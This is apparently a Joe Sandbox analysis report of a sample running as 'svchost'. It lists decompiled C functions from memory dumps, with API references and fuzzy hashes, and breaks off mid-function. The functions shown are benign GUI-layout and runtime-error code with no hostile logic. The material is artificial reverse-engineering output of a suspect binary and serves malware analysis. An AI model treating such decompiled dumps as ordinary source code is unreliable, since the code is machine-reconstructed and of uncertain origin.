    • Instruction Fuzzy Hash: 0C912971200B05AFD318CF69C985E6AF7E6FB88700F048A2DA99AC7754EB75FC058B54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E004127C0(void* __ebx, void* __ecx, void* __edi, void* __ebp) {
    				intOrPtr _v8;
    				struct HDC__* _t54;
    				int _t63;
    				int _t64;
    				intOrPtr _t71;
    				long _t76;
    				intOrPtr _t90;
    				intOrPtr _t91;
    				intOrPtr _t92;
    				intOrPtr _t119;
    				void* _t123;
    				void* _t124;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t129;
    
    				_t129 = __ecx;
    				_t54 =  *(__ecx + 0x24c);
    				if(_t54 == 0) {
    					L46:
    					return _t54;
    				} else {
    					_t123 = __ecx + 0x260;
    					if(_t123 == 0 ||  *((intOrPtr*)(_t123 + 4)) == 0) {
    						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(7);
    					} else {
    						if(_t123 != 0) {
    							_t92 =  *((intOrPtr*)(_t123 + 4));
    						} else {
    							_t92 = 0;
    						}
    						if(GetCurrentObject(_t54, 1) != _t92) {
    							E00489512(_t129 + 0x248, _t123);
    						}
    					}
    					_t124 = _t129 + 0x268;
    					if(_t124 == 0 ||  *((intOrPtr*)(_t124 + 4)) == 0) {
    						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(0);
    					} else {
    						if(_t124 != 0) {
    							_t91 =  *((intOrPtr*)(_t124 + 4));
    						} else {
    							_t91 = 0;
    						}
    						if(GetCurrentObject( *(_t129 + 0x24c), 2) != _t91) {
    							E00489512(_t129 + 0x248, _t124);
    						}
    					}
    					_t125 = _t129 + 0x270;
    					if(_t125 == 0 ||  *((intOrPtr*)(_t125 + 4)) == 0) {
    						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x24))(0x11);
    					} else {
    						if(_t125 != 0) {
    							_t90 =  *((intOrPtr*)(_t125 + 4));
    						} else {
    							_t90 = 0;
    						}
    						if(GetCurrentObject( *(_t129 + 0x24c), 6) != _t90) {
    							 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x28))(_t125);
    						}
    					}
    					if(_v8 != 1) {
    						_t126 =  *((intOrPtr*)(_t129 + 0x58));
    					} else {
    						_t126 =  *((intOrPtr*)(_t129 + 0x5c));
    					}
    					if(GetTextColor( *(_t129 + 0x250)) != _t126) {
    						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x248)) + 0x30))(_t126);
    					}
    					if( *((intOrPtr*)(_t129 + 0x60)) == 0xff000000) {
    						if(GetBkMode( *(_t129 + 0x250)) != 1) {
    							E004895EE(_t129 + 0x248, 1);
    						}
    						if(GetBkColor( *(_t129 + 0x250)) == 0xffffff) {
    							goto L40;
    						} else {
    							_t71 =  *((intOrPtr*)(_t129 + 0x248));
    							_push(0xffffff);
    							goto L39;
    						}
    					} else {
    						if(GetBkMode( *(_t129 + 0x250)) != 2) {
    							E004895EE(_t129 + 0x248, 2);
    						}
    						_t76 = GetBkColor( *(_t129 + 0x250));
    						_t119 =  *((intOrPtr*)(_t129 + 0x60));
    						if(_t76 == _t119) {
    							L40:
    							_t63 = GetROP2( *(_t129 + 0x250));
    							_t101 =  *((intOrPtr*)(_t129 + 0x48)) + 1;
    							if(_t63 !=  *((intOrPtr*)(_t129 + 0x48)) + 1) {
    								E0048964A(_t129 + 0x248, _t101);
    							}
    							_t64 = GetStretchBltMode( *(_t129 + 0x250));
    							if(_t64 != E004204B0()) {
    								E00489678(_t129 + 0x248, E004204B0());
    							}
    							_t54 = GetPolyFillMode( *(_t129 + 0x250));
    							if(_t54 == 2) {
    								goto L46;
    							} else {
    								return E0048961C(_t129 + 0x248, 2);
    							}
    						} else {
    							_t71 =  *((intOrPtr*)(_t129 + 0x248));
    							_push(_t119);
    							L39:
    							 *((intOrPtr*)(_t71 + 0x2c))();
    							goto L40;
    						}
    					}
    				}
    			}


    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Mode$ColorCurrentObject$FillPolyStretchText
    • String ID:
    • API String ID: 544274770-0
    • Opcode ID: 9b59efc0e278b279504834f3f31008d29a785bf548e72ea1c658155bc1236caf
    • Instruction ID: d9bf0422f064176de89f7a77b2ccb0f73d6f2a71fc3de3935330b70509fd61df
    • Opcode Fuzzy Hash: 9b59efc0e278b279504834f3f31008d29a785bf548e72ea1c658155bc1236caf
    • Instruction Fuzzy Hash: DC515071210A019BC764EB64CA88BEBB3A5FF44305F144A1EE26FD7260DB74F895CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00422700(void* __ecx, void* __eflags) {
    				int _v4;
    				intOrPtr _v12;
    				int _v40;
    				int _v44;
    				struct tagRECT _v60;
    				struct tagRECT _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				signed int _v104;
    				long _v108;
    				intOrPtr _v116;
    				void* __edi;
    				void* __ebp;
    				intOrPtr _t80;
    				int _t83;
    				intOrPtr _t89;
    				long _t96;
    				int _t98;
    				signed int _t101;
    				intOrPtr _t112;
    				void* _t123;
    				void* _t139;
    				void* _t140;
    				int _t142;
    				void* _t144;
    				intOrPtr _t149;
    				intOrPtr _t150;
    				signed int _t189;
    				void* _t199;
    				signed int _t203;
    				intOrPtr* _t205;
    				long _t206;
    				void* _t209;
    				intOrPtr _t212;
    				intOrPtr _t215;
    				void* _t216;
    
    				_push(0xffffffff);
    				_push(E0048ED3A);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t215;
    				_t216 = _t215 - 0x48;
    				_push(_t199);
    				_t209 = __ecx;
    				E004845FE(__ecx, _t199);
    				_t200 = 0;
    				if( *(_t209 + 0x7c) == 0) {
    					_t212 =  *((intOrPtr*)(_t209 + 0x74));
    					if(_t212 <= 0) {
    						goto L10;
    					} else {
    						if(_t212 != 0) {
    							_t200 =  *((intOrPtr*)(_t209 + 0x6c));
    						}
    						if(E004267F0(_t200, _t212) == 0) {
    							_t139 = E0041F240(_t200, _t212);
    							_t216 = _t216 + 8;
    							if(_t139 == 1) {
    								L9:
    								 *(_t209 + 0x7c) = 2;
    							} else {
    								_t140 = E00428200(_t200, _t212);
    								_t216 = _t216 + 8;
    								if(_t140 == 1) {
    									goto L9;
    								}
    							}
    							goto L10;
    						} else {
    							_t142 = 1;
    							 *(_t209 + 0x7c) = 1;
    						}
    					}
    				} else {
    					 *(_t209 + 0x7c) = 0;
    					L10:
    					_t142 = 1;
    				}
    				if( *((intOrPtr*)(_t209 + 0x78)) == _t142) {
    					E00487663(E00487410(_t209, 6), 0);
    					E00487663(E00487410(_t209, 3), 0);
    					E00487663(E00487410(_t209, _t142), 0);
    				}
    				_t80 =  *((intOrPtr*)(_t209 + 0x60));
    				if(_t80 == 0xb) {
    					L15:
    					_t149 = _t209 + 0x80;
    				} else {
    					_t149 = _t209 + 0xbc;
    					if( *((intOrPtr*)(_t209 + 0x78)) == _t142) {
    						goto L15;
    					}
    				}
    				 *((intOrPtr*)(_t209 + 0xf8)) = _t149;
    				if(_t80 != 0xc) {
    					if( *(_t209 + 0x7c) == _t142) {
    						_t206 = E00483003(0x104);
    						_t216 = _t216 + 4;
    						_v76.left = _t206;
    						_v4 = 0;
    						if(_t206 == 0) {
    							_t206 = 0;
    						} else {
    							E0043A2C0(_t206);
    							 *((intOrPtr*)(_t206 + 0xf8)) = 0x49673c;
    							 *((intOrPtr*)(_t206 + 0xfc)) = 0;
    							 *_t206 = 0x4968d8;
    							 *((intOrPtr*)(_t206 + 0xf4)) = 0;
    							 *(_t206 + 0x100) = _t142;
    						}
    						 *(_t209 + 0xfc) = _t206;
    						_v4 = 0xffffffff;
    						E00489EBE(_t206 + 0xf8, CreateSolidBrush(0xffffff));
    						 *( *(_t209 + 0xfc) + 0xdc) = 0xffffff;
    						GetWindowRect( *(_t209 + 0xd8),  &(_v60.bottom));
    						E00489A84(_t209,  &(_v60.bottom));
    						_push(0);
    						_push(0x469);
    						_t200 =  *( *(_t209 + 0xfc));
    						_push(_t209);
    						_push( &(_v60.right));
    						_push(0x50800000);
    						_push(0);
    						_t123 = GetStockObject(5);
    						_push(E004858C5(0, LoadCursorA(0, 0x7f00), _t123, 0));
    						if( *((intOrPtr*)( *( *(_t209 + 0xfc)) + 0x54))() == 0) {
    							E004862B9(_t209, 0x4b1b68, 0x4b1a98, 0x10);
    							 *(_t209 + 0x7c) = 0;
    						}
    						E0043C250( *(_t209 + 0xfc), 2);
    					}
    					_t83 =  *(_t209 + 0x7c);
    					if(_t83 == 0) {
    						_t149 =  *((intOrPtr*)(_t209 + 0xf8));
    						_push(8);
    						goto L31;
    					} else {
    						if(_t83 == 2) {
    							_t89 = E00487410(_t209, 5);
    							_v80 = _t89;
    							GetWindowRect( *(_t89 + 0x1c),  &_v60);
    							GetWindowRect( *( *((intOrPtr*)(_t209 + 0xf8)) + 0x1c),  &_v76);
    							_t189 = _v76.top;
    							_t203 = _v60.top - _t189;
    							GetWindowRect( *(_t209 + 0x1c),  &_v76);
    							_t96 = _v76.bottom.left - _t203;
    							_v76.bottom.left = _t96;
    							_t144 = _t96 - _v76.top;
    							_t98 = GetSystemMetrics(1);
    							asm("cdq");
    							_t101 = _t98 - _t144 - _t189 >> 1;
    							_v76.top = _t101;
    							_v76.bottom.left = _t144 + _t101;
    							E00487591(_t209, _v76.left, _t101, _v76.right - _v76.left, _t144 + _t101 - _t101, 1);
    							_v104 =  ~_t203;
    							_v76.bottom.left = 5;
    							_v60.left = 7;
    							_v60.top = 6;
    							_v60.right = 3;
    							_v60.bottom.left = 4;
    							_v44 = 1;
    							_v40 = 2;
    							_t205 =  &(_v76.bottom);
    							_v108 = 7;
    							do {
    								GetWindowRect( *(E00487410(_t209,  *_t205) + 0x1c),  &_v60);
    								E00489A84(_t209,  &_v60);
    								OffsetRect( &(_v76.bottom), 0, _v88);
    								E00487591(E00487410(_t209,  *_t205), _v76.right, _v76.bottom.left, _v60.left - _v76.right, _v60.top - _v76.bottom.left, 1);
    								_t205 = _t205 + 4;
    								_t112 = _v116 - 1;
    								_v116 = _t112;
    							} while (_t112 != 0);
    							E00487621(E00487410(_t209, 7), 8);
    							_t200 = _v84;
    							E00487621(_t200, 8);
    							_t150 = _t200;
    							goto L32;
    						}
    					}
    				} else {
    					_push(8);
    					L31:
    					E00487621(_t149);
    					_t150 =  *((intOrPtr*)(_t209 + 0xf8));
    					L32:
    					E0048768A(_t150);
    				}
    				E00422480(_t209, _t200);
    				 *[fs:0x0] = _v12;
    				return 0;
    			}

    APIs
    • CreateSolidBrush.GDI32(00FFFFFF), ref: 0042285F
    • GetWindowRect.USER32(?), ref: 00422889
    • GetStockObject.GDI32(00000005), ref: 004228B7
    • LoadCursorA.USER32(00000000,00007F00), ref: 004228C5
    • GetWindowRect.USER32(?,?), ref: 00422933
    • GetWindowRect.USER32(?,?), ref: 00422944
    • GetWindowRect.USER32(?,?), ref: 00422959
    • GetSystemMetrics.USER32(00000001), ref: 0042296F
    • GetWindowRect.USER32(?,?), ref: 004229FA
    • OffsetRect.USER32(?,00000000,00000001), ref: 00422A14
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Window$BrushCreateCursorLoadMetricsObjectOffsetSolidStockSystem
    • String ID:
    • API String ID: 3805611468-0
    • Opcode ID: 7b52b9d85a0d96c78aa3691f5ee9f5ff6a6d96920106f39a5228658626a4595f
    • Instruction ID: 3c093d1a7ed56f4b32d8130247ea3491ab2f8cf374d530c487a91e4658cf990e
    • Opcode Fuzzy Hash: 7b52b9d85a0d96c78aa3691f5ee9f5ff6a6d96920106f39a5228658626a4595f
    • Instruction Fuzzy Hash: 6DA1CE70708701AFD724EF25C991B6FB7E5ABC4708F10492EF15687391EBB8E8058B5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00420FD0(intOrPtr __ecx, intOrPtr _a4) {
    				intOrPtr _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				struct tagRECT _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				struct tagRECT _v80;
    				intOrPtr _v84;
    				void* _t74;
    				void* _t76;
    				int _t81;
    				intOrPtr _t84;
    				intOrPtr _t85;
    				long _t86;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				long _t92;
    				intOrPtr _t93;
    				intOrPtr _t94;
    				intOrPtr _t95;
    				intOrPtr _t114;
    				intOrPtr _t121;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				long _t131;
    				long _t134;
    				intOrPtr _t135;
    				intOrPtr _t136;
    				intOrPtr _t137;
    				long _t144;
    				long _t149;
    				long _t150;
    				intOrPtr _t158;
    				intOrPtr _t163;
    				intOrPtr _t164;
    				long _t166;
    
    				_v84 = __ecx;
    				GetWindowRect( *(__ecx + 0xa0),  &_v48);
    				GetWindowRect( *(_a4 + 0x1c),  &_v64);
    				_t121 = _v64.right;
    				_t144 = _v64.left;
    				_t74 = _v48.right - _v48.left;
    				_t114 = _v64.top;
    				_t158 = _v64.bottom;
    				_v8 = _t121;
    				_t166 = _t144;
    				_v12 = _t114;
    				_v4 = _t158;
    				if(_t121 - _t144 > _t74) {
    					_v64.right = _t74 + _t144;
    				}
    				_t76 = _v48.bottom - _v48.top;
    				if(_t158 - _t114 > _t76) {
    					_v64.bottom = _t76 + _t114;
    				}
    				IntersectRect( &_v80,  &_v64,  &_v48);
    				_v32.top = _v80.top;
    				_v32.right = _v80.right;
    				_v32.left = _v80.left;
    				_v32.bottom = _v80.bottom;
    				_t81 = EqualRect( &_v32,  &_v64);
    				if(_t81 == 0) {
    					_t161 = _v84;
    					GetWindowRect( *(_v84 + 0xdc),  &_v80);
    					_t163 = _v64.top;
    					_t84 = _v48.top;
    					if(_t163 >= _t84) {
    						_t127 = _v64.bottom;
    						_t85 = _v48.bottom;
    						if(_t127 > _t85) {
    							_t163 = _t163 + _t85 - _t127;
    						}
    					} else {
    						_t163 = _t84;
    					}
    					_t149 = _v64.left;
    					_t86 = _v48.left;
    					if(_t149 >= _t86) {
    						_t128 = _v64.right;
    						_t87 = _v48.right;
    						if(_t128 > _t87) {
    							_t149 = _t149 + _t87 - _t128;
    						}
    					} else {
    						_t149 = _t86;
    					}
    					_t88 = _v80.top;
    					_t164 = _t163 + _t88 - _v12;
    					_t131 = _v80.left;
    					_v64.top = _t164;
    					_t150 = _t149 + _t131 - _t166;
    					_v64.left = _t150;
    					OffsetRect( &_v80,  ~(_t131 - _t150),  ~(_t88 - _t164));
    					_t92 = _v80.left;
    					_t134 = _v48.left;
    					if(_t92 > _t134) {
    						OffsetRect( &_v80,  ~(_t92 - _t134), 0);
    					}
    					_t135 = _v80.right;
    					_t93 = _v48.right;
    					if(_t135 < _t93) {
    						OffsetRect( &_v80, _t93 - _t135, 0);
    					}
    					_t94 = _v80.top;
    					_t136 = _v48.top;
    					if(_t94 > _t136) {
    						OffsetRect( &_v80, 0,  ~(_t94 - _t136));
    					}
    					_t137 = _v80.bottom;
    					_t95 = _v48.bottom;
    					if(_t137 < _t95) {
    						OffsetRect( &_v80, 0, _t95 - _t137);
    					}
    					E00489A84(_t161 + 0x84,  &_v80);
    					_t81 = E00487591(_t161 + 0xc0, _v84, _v80.left, _v80.top - _v84, _v80.right - _v80.left, 1);
    				}
    				return _t81;
    			}

    APIs
    • GetWindowRect.USER32(?,?), ref: 00420FED
    • GetWindowRect.USER32(?,?), ref: 00420FFC
    • IntersectRect.USER32(?,?,?), ref: 00421055
    • EqualRect.USER32(?,?), ref: 00421085
    • GetWindowRect.USER32(?,?), ref: 004210A3
    • OffsetRect.USER32(?,?,?), ref: 0042111A
    • OffsetRect.USER32(?,?,00000000), ref: 00421134
    • OffsetRect.USER32(?,?,00000000), ref: 0042114C
    • OffsetRect.USER32(?,00000000,?), ref: 00421166
    • OffsetRect.USER32(?,00000000,?), ref: 0042117E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$Window$EqualIntersect
    • String ID:
    • API String ID: 2638238157-0
    • Opcode ID: b5059615557ef41e567cc05585b1659c6724358664900b4b97c9f024eb2b96d7
    • Instruction ID: 39f88f8f80d00238e6b95b454080b553bb4d445c19e9b8ea437eb5a3b31021ec
    • Opcode Fuzzy Hash: b5059615557ef41e567cc05585b1659c6724358664900b4b97c9f024eb2b96d7
    • Instruction Fuzzy Hash: 12512A75608342AFC308CF28D98096FBBE9ABD8744F404A2EF985D3354DA74ED45CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004385C0(void* __ecx) {
    				struct tagRECT _v16;
    				int _v20;
    				intOrPtr _v24;
    				void* __ebp;
    				int _t23;
    				int _t24;
    				int _t25;
    				signed int _t39;
    				int _t41;
    				int _t42;
    				int _t43;
    				void* _t56;
    				signed int _t61;
    
    				_t56 = __ecx;
    				_t61 = GetSystemMetrics(0x2e);
    				_t39 = GetSystemMetrics(0x2d);
    				_t23 = GetSystemMetrics(0xa);
    				_t41 = _t39 + _t39 * 4;
    				if(_t23 <= _t41) {
    					_v20 = _t41;
    				} else {
    					_v20 = GetSystemMetrics(0xa);
    				}
    				_t24 = GetSystemMetrics(9);
    				_t42 = _t61 + _t61 * 4;
    				if(_t24 <= _t42) {
    					_t25 = _t42;
    				} else {
    					_t25 = GetSystemMetrics(9);
    				}
    				_t43 = _v20;
    				_v20 = _t43;
    				if(_t43 <= _t25) {
    					_v20 = _t25;
    				}
    				GetWindowRect( *(_t56 + 0x1c),  &_v16);
    				if(E00484C84(_t61, GetParent( *(_t56 + 0x1c))) != 0) {
    					E00489A84(_t29,  &_v16);
    				}
    				GetWindowRect( *(_t56 + 0x1c),  &_v16);
    				E00489A84(_t56,  &_v16);
    				return SetRect(_t56 + 0x50, _v16.top - _v24 - _t39, _t61 + _v16.left, _v16.top - _t39, _v16.right - _t61);
    			}

    APIs
    • GetSystemMetrics.USER32(0000002E), ref: 004385D1
    • GetSystemMetrics.USER32(0000002D), ref: 004385D7
    • GetSystemMetrics.USER32(0000000A), ref: 004385DD
    • GetSystemMetrics.USER32(0000000A), ref: 004385E8
    • GetSystemMetrics.USER32(00000009), ref: 004385F6
    • GetSystemMetrics.USER32(00000009), ref: 00438602
    • GetWindowRect.USER32(?,?), ref: 00438627
    • GetParent.USER32(?), ref: 0043862D
    • GetWindowRect.USER32(?,00000000), ref: 00438652
    • SetRect.USER32(?,?,00000000,?,?), ref: 00438684
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MetricsSystem$Rect$Window$Parent
    • String ID:
    • API String ID: 3457858938-0
    • Opcode ID: b87edf11274884cb9e5bbe53bbd641921e0142f545444fdd4bd3ccc6a9b87188
    • Instruction ID: f7a7af18747ca5311e642bf31800b03f59eb2646073d63be27b53c3deea8a244
    • Opcode Fuzzy Hash: b87edf11274884cb9e5bbe53bbd641921e0142f545444fdd4bd3ccc6a9b87188
    • Instruction Fuzzy Hash: 3F21A3B1A443066FD704DF68DD4593FB7A8EBC8700F00492EB905D3281EBB4ED098BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00474EA7(void* __edi, long _a4) {
    				char _v164;
    				char _v424;
    				int _t17;
    				long _t19;
    				signed int _t42;
    				long _t47;
    				void* _t48;
    				signed int _t54;
    				void** _t56;
    				void* _t57;
    
    				_t48 = __edi;
    				_t47 = _a4;
    				_t42 = 0;
    				_t17 = 0x4b9968;
    				while(_t47 !=  *_t17) {
    					_t17 = _t17 + 8;
    					_t42 = _t42 + 1;
    					if(_t17 < 0x4b99f8) {
    						continue;
    					}
    					break;
    				}
    				_t54 = _t42 << 3;
    				_t2 = _t54 + 0x4b9968; // 0xa4000000
    				if(_t47 ==  *_t2) {
    					_t17 =  *0x4e1778; // 0x0
    					if(_t17 == 1 || _t17 == 0 &&  *0x4b91f4 == 1) {
    						_t16 = _t54 + 0x4b996c; // 0x49dba4
    						_t56 = _t16;
    						_t19 = E00473450( *_t56);
    						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
    					} else {
    						if(_t47 != 0xfc) {
    							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
    								E00477840( &_v424, "<program name unknown>");
    							}
    							_push(_t48);
    							_t49 =  &_v424;
    							if(E00473450( &_v424) + 1 > 0x3c) {
    								_t49 = E00473450( &_v424) +  &_v424 - 0x3b;
    								E004714B0(E00473450( &_v424) +  &_v424 - 0x3b, "...", 3);
    								_t57 = _t57 + 0x10;
    							}
    							E00477840( &_v164, "Runtime Error!\n\nProgram: ");
    							E00477850( &_v164, _t49);
    							E00477850( &_v164, "\n\n");
    							_t12 = _t54 + 0x4b996c; // 0x49dba4
    							E00477850( &_v164,  *_t12);
    							_t17 = E0047C902( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
    						}
    					}
    				}
    				return _t17;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00474F14
    • GetStdHandle.KERNEL32(000000F4,0049DBA4,00000000,?,00000000,?), ref: 00474FEA
    • WriteFile.KERNEL32(00000000), ref: 00474FF1
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: File$HandleModuleNameWrite
    • String ID: #TG$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
    • API String ID: 3784150691-3961000474
    • Opcode ID: 30dfc0f02f68c4f8f43f7053faf01fc5dfcaab5816e232e9a751187024a2c1a2
    • Instruction ID: 427fb8dc755007a937ad8220d2362343b5f7c9a607f97e75cc55c323c529deb4
    • Opcode Fuzzy Hash: 30dfc0f02f68c4f8f43f7053faf01fc5dfcaab5816e232e9a751187024a2c1a2
    • Instruction Fuzzy Hash: 5D31F972A002086FDF20EB60CD49FEA776CEB85304F50807BF558E6141E7B8D980CA59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E0047C902(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr* _t4;
    				intOrPtr* _t7;
    				_Unknown_base(*)()* _t11;
    				void* _t14;
    				struct HINSTANCE__* _t15;
    				void* _t17;
    
    				_t14 = 0;
    				_t17 =  *0x4e1ac4 - _t14; // 0x0
    				if(_t17 != 0) {
    					L4:
    					_t4 =  *0x4e1ac8; // 0x0
    					if(_t4 != 0) {
    						_t14 =  *_t4();
    						if(_t14 != 0) {
    							_t7 =  *0x4e1acc; // 0x0
    							if(_t7 != 0) {
    								_t14 =  *_t7(_t14);
    							}
    						}
    					}
    					return  *0x4e1ac4(_t14, _a4, _a8, _a12);
    				}
    				_t15 = LoadLibraryA("user32.dll");
    				if(_t15 == 0) {
    					L10:
    					return 0;
    				}
    				_t11 = GetProcAddress(_t15, "MessageBoxA");
    				 *0x4e1ac4 = _t11;
    				if(_t11 == 0) {
    					goto L10;
    				} else {
    					 *0x4e1ac8 = GetProcAddress(_t15, "GetActiveWindow");
    					 *0x4e1acc = GetProcAddress(_t15, "GetLastActivePopup");
    					goto L4;
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00474FCB,?,Microsoft Visual C++ Runtime Library,00012010,?,0049DBA4,?,0049DBF4,?,?,?,Runtime Error!Program: ), ref: 0047C914
    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0047C92C
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0047C93D
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0047C94A
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
    • API String ID: 2238633743-4044615076
    • Opcode ID: f218762c8d1058e1420daa76b58b8b5f2180d44cded82771e82e7976566f0777
    • Instruction ID: 0136df4196457bb8bd6c51fde2089160d29575766b3ed94f02237bca75df0ab6
    • Opcode Fuzzy Hash: f218762c8d1058e1420daa76b58b8b5f2180d44cded82771e82e7976566f0777
    • Instruction Fuzzy Hash: 0C0175B1241281AB8B508FB69CC0AA77FDCA78574070844BFF604D2671D678C8418B5D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 40%
    			E0048705A(signed short _a4, signed int _a8) {
    				struct HINSTANCE__* _t6;
